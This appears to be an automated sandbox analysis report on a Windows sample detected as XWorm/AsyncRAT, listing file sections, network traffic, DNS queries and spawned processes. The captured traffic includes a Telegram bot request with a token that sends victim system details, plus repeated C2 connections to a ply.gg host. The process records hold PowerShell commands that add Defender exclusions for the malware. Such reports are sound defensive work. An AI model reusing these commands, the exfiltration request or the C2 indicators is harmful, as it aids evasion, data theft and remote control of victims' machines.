IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xefc4 | 0xf000 | f5e402e611efbcccc41bed341d098887 | False | 0.6063313802083333 | data | 6.031741596066072 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x12000 | 0x1970e | 0x19800 | 790c09c179861bc5261255b9db54d9f5 | False | 0.07728247549019608 | data | 3.076758855643035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0xc | 0x200 | 38c37bbf7eff4050483d2108781ec120 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x12220 | 0xb5b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9205366357069144
RT_ICON | 0x12d7c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.02651425529397847
RT_ICON | 0x235a4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.06004959848842702
RT_ICON | 0x277cc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.1004149377593361
RT_ICON | 0x29d74 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.13062851782363977
RT_ICON | 0x2ae1c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.27925531914893614
RT_GROUP_ICON | 0x2b284 | 0x5a | data | | | 0.7333333333333333
RT_VERSION | 0x2b2e0 | 0x244 | data | | | 0.4706896551724138
RT_MANIFEST | 0x2b524 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T12:22:53.328109+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.6 | 49399 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 12:22:52.179806948 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:52.179848909 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:52.179920912 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:52.187416077 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:52.187428951 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.015554905 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.015830994 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:53.017664909 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:53.017683983 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.017934084 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.067354918 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:53.072253942 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:53.115333080 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.328115940 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.328186035 CET | 443 | 49399 | 149.154.167.220 | 192.168.2.6
Oct 30, 2024 12:22:53.328424931 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:53.346575975 CET | 49399 | 443 | 192.168.2.6 | 149.154.167.220
Oct 30, 2024 12:22:53.582041025 CET | 49406 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:22:53.587526083 CET | 1930 | 49406 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:22:53.587620974 CET | 49406 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:22:53.938579082 CET | 49406 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:22:53.944031000 CET | 1930 | 49406 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:02.084779978 CET | 1930 | 49406 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:02.084867001 CET | 49406 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:03.645735025 CET | 49406 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:03.647589922 CET | 49407 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:03.655503035 CET | 1930 | 49406 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:03.657320976 CET | 1930 | 49407 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:03.657397985 CET | 49407 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:03.677114010 CET | 49407 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:03.687040091 CET | 1930 | 49407 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:12.129286051 CET | 1930 | 49407 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:12.129434109 CET | 49407 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:16.504950047 CET | 49407 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:16.506784916 CET | 49409 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:16.510524035 CET | 1930 | 49407 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:16.512336016 CET | 1930 | 49409 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:16.512439013 CET | 49409 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:16.528563023 CET | 49409 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:16.534004927 CET | 1930 | 49409 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:24.991698027 CET | 1930 | 49409 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:24.991841078 CET | 49409 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:26.442692995 CET | 49409 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:26.445801973 CET | 49410 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:26.449553967 CET | 1930 | 49409 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:26.452541113 CET | 1930 | 49410 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:26.452672958 CET | 49410 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:26.472737074 CET | 49410 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:26.478382111 CET | 1930 | 49410 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:34.937421083 CET | 1930 | 49410 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:34.937524080 CET | 49410 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:36.692759991 CET | 49410 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:36.694552898 CET | 49411 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:36.698215008 CET | 1930 | 49410 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:36.700011969 CET | 1930 | 49411 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:36.700170040 CET | 49411 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:36.716130972 CET | 49411 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:36.721749067 CET | 1930 | 49411 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:45.183286905 CET | 1930 | 49411 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:45.183501959 CET | 49411 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:45.364578009 CET | 49411 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:45.365906000 CET | 49412 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:45.371422052 CET | 1930 | 49411 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:45.372663021 CET | 1930 | 49412 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:45.372756958 CET | 49412 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:45.387691975 CET | 49412 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:45.393650055 CET | 1930 | 49412 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:53.855021954 CET | 1930 | 49412 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:53.855159044 CET | 49412 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:53.942687988 CET | 49412 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:53.944118977 CET | 49414 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:53.948357105 CET | 1930 | 49412 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:53.949680090 CET | 1930 | 49414 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:23:53.949794054 CET | 49414 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:53.965507984 CET | 49414 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:23:53.970870972 CET | 1930 | 49414 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:24:00.378473043 CET | 49414 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:24:00.383905888 CET | 1930 | 49414 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:24:01.052356958 CET | 49414 | 1930 | 192.168.2.6 | 147.185.221.23
Oct 30, 2024 12:24:01.057881117 CET | 1930 | 49414 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:24:02.425492048 CET | 1930 | 49414 | 147.185.221.23 | 192.168.2.6
Oct 30, 2024 12:24:02.425585985 CET | 49414 | 1930 | 192.168.2.6 | 147.185.221.23
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 12:22:40.061115026 CET | 53 | 62527 | 162.159.36.2 | 192.168.2.6
Oct 30, 2024 12:22:41.022016048 CET | 53 | 54588 | 1.1.1.1 | 192.168.2.6
Oct 30, 2024 12:22:52.167454004 CET | 57914 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 12:22:52.174889088 CET | 53 | 57914 | 1.1.1.1 | 192.168.2.6
Oct 30, 2024 12:22:53.466389894 CET | 49825 | 53 | 192.168.2.6 | 1.1.1.1
Oct 30, 2024 12:22:53.500117064 CET | 53 | 49825 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 12:22:52.167454004 CET | 192.168.2.6 | 1.1.1.1 | 0x633d | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:22:53.466389894 CET | 192.168.2.6 | 1.1.1.1 | 0xf11 | Standard query (0) | vehicle-temp.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 12:22:52.174889088 CET | 1.1.1.1 | 192.168.2.6 | 0x633d | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:22:53.500117064 CET | 1.1.1.1 | 192.168.2.6 | 0xf11 | No error (0) | vehicle-temp.gl.at.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false
                                                                                          • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49399 | 149.154.167.220 | 443 | 2732 | C:\Users\user\Desktop\9RgE5uOJwX.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-30 11:22:53 UTC | 452 | OUT | GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-10-30 11:22:53 UTC | 346 | IN | HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Wed, 30 Oct 2024 11:22:53 GMT
    Content-Type: application/json
    Content-Length: 73
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-30 11:22:53 UTC | 73 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 68 61 74 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat not found"}


                                                                                          Target ID:0
                                                                                          Start time:07:21:56
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Users\user\Desktop\9RgE5uOJwX.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\9RgE5uOJwX.exe"
                                                                                          Imagebase:0xcf0000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:72F5F19B35B22D82D8459F5E0739C248
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:2
                                                                                          Start time:07:22:00
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:07:22:00
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:07:22:07
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:07:22:07
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:07:22:17
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:07:22:17
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:07:22:31
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:07:22:31
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:07:23:03
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\MicrosoftClient.exe"
                                                                                          Imagebase:0xa00000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:72F5F19B35B22D82D8459F5E0739C248
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: ditekSHen
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 81%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:07:23:11
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\MicrosoftClient.exe"
                                                                                          Imagebase:0xd10000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:72F5F19B35B22D82D8459F5E0739C248
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:19.2%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:3
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 4103 7ffd343d12b1 4104 7ffd343d12b7 RtlSetProcessIsCritical 4103->4104 4106 7ffd343d2822 4104->4106

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 468 7ffd343d6936-7ffd343d6943 469 7ffd343d6945-7ffd343d694d 468->469 470 7ffd343d694e-7ffd343d6979 468->470 469->470 471 7ffd343d697b-7ffd343d69bf 470->471 472 7ffd343d69c0-7ffd343d6a17 470->472 471->472 476 7ffd343d6a19-7ffd343d6a22 472->476 477 7ffd343d6a83 472->477 476->477 478 7ffd343d6a24-7ffd343d6a30 476->478 479 7ffd343d6a85-7ffd343d6aaa 477->479 480 7ffd343d6a69-7ffd343d6a81 478->480 481 7ffd343d6a32-7ffd343d6a44 478->481 486 7ffd343d6aac-7ffd343d6ab5 479->486 487 7ffd343d6b16 479->487 480->479 482 7ffd343d6a46 481->482 483 7ffd343d6a48-7ffd343d6a5b 481->483 482->483 483->483 485 7ffd343d6a5d-7ffd343d6a65 483->485 485->480 486->487 489 7ffd343d6ab7-7ffd343d6ac3 486->489 488 7ffd343d6b18-7ffd343d6bc0 487->488 500 7ffd343d6bc2-7ffd343d6bcc 488->500 501 7ffd343d6c2e 488->501 490 7ffd343d6afc-7ffd343d6b14 489->490 491 7ffd343d6ac5-7ffd343d6ad7 489->491 490->488 493 7ffd343d6ad9 491->493 494 7ffd343d6adb-7ffd343d6aee 491->494 493->494 494->494 495 7ffd343d6af0-7ffd343d6af8 494->495 495->490 500->501 503 7ffd343d6bce-7ffd343d6bdb 500->503 502 7ffd343d6c30-7ffd343d6c59 501->502 510 7ffd343d6c5b-7ffd343d6c66 502->510 511 7ffd343d6cc3 502->511 504 7ffd343d6c14-7ffd343d6c2c 503->504 505 7ffd343d6bdd-7ffd343d6bef 503->505 504->502 506 7ffd343d6bf1 505->506 507 7ffd343d6bf3-7ffd343d6c06 505->507 506->507 507->507 509 7ffd343d6c08-7ffd343d6c10 507->509 509->504 510->511 513 7ffd343d6c68-7ffd343d6c76 510->513 512 7ffd343d6cc5-7ffd343d6d56 511->512 521 7ffd343d6d5c-7ffd343d6d6b 512->521 514 7ffd343d6c78-7ffd343d6c8a 513->514 515 7ffd343d6caf-7ffd343d6cc1 513->515 517 7ffd343d6c8c 514->517 518 7ffd343d6c8e-7ffd343d6ca1 514->518 515->512 517->518 518->518 519 7ffd343d6ca3-7ffd343d6cab 518->519 519->515 522 7ffd343d6d73-7ffd343d6dd8 call 7ffd343d6df4 521->522 523 7ffd343d6d6d 521->523 530 7ffd343d6dda 522->530 531 7ffd343d6ddf-7ffd343d6df3 522->531 523->522 530->531
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 23f461845bede5c693b74295d476c88cd9592ddd80363012ea11033b207768a2
                                                                                            • Instruction ID: 479b56665c81859cab447e395d80e39a7898fda9ee0a5e7a383f342a0d7eac4a
                                                                                            • Opcode Fuzzy Hash: 23f461845bede5c693b74295d476c88cd9592ddd80363012ea11033b207768a2
                                                                                            • Instruction Fuzzy Hash: 30F1F830A49A4D4FEBA8EF28C8557E937D1FF56310F04426EE85DC7291CF3999448B81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 379b462fa47b81f8f00c23d002d61e914afdd0ace0ff115dba0c3401ce38cc49
                                                                                            • Instruction ID: 2dff8fa620d6dc27f09a80b0f981f7c1a4e0adc0cb474ae52e24e592e13119fd
                                                                                            • Opcode Fuzzy Hash: 379b462fa47b81f8f00c23d002d61e914afdd0ace0ff115dba0c3401ce38cc49
                                                                                            • Instruction Fuzzy Hash: C4E1C630A09A4D8FEBA8EF28C8657E977D1EF56310F04427AD84DC7291DF399945CB81

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 144 7ffd343d273d-7ffd343d2820 RtlSetProcessIsCritical 148 7ffd343d2828-7ffd343d285d 144->148 149 7ffd343d2822 144->149 149->148
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2695349919-0
                                                                                            • Opcode ID: fc3854d2f57365db0c98801e578bc60cc0b631b05d576c9cea56774c5fb349e4
                                                                                            • Instruction ID: f77ece349a459b2e4785ecd2b9fd381dc8b3fd2c6ae8562db19ba943fff9e702
                                                                                            • Opcode Fuzzy Hash: fc3854d2f57365db0c98801e578bc60cc0b631b05d576c9cea56774c5fb349e4
                                                                                            • Instruction Fuzzy Hash: 7B41D33190C7488FDB29DFA8D855AE9BBF0EF56311F04416ED08AD3692CB78A446CB91

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 151 7ffd343d12b1-7ffd343d27ba 155 7ffd343d27c2-7ffd343d2820 RtlSetProcessIsCritical 151->155 156 7ffd343d2828-7ffd343d285d 155->156 157 7ffd343d2822 155->157 157->156
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2695349919-0
                                                                                            • Opcode ID: 6689ab6bd4fa90c08361e121d6aa50b4bd4c7b87e3ffdb2554e47c46e20d61bc
                                                                                            • Instruction ID: b6dc68271a6d20b5f6bff311d5c31937de2b8573a9a38441f25f1843a296426c
                                                                                            • Opcode Fuzzy Hash: 6689ab6bd4fa90c08361e121d6aa50b4bd4c7b87e3ffdb2554e47c46e20d61bc
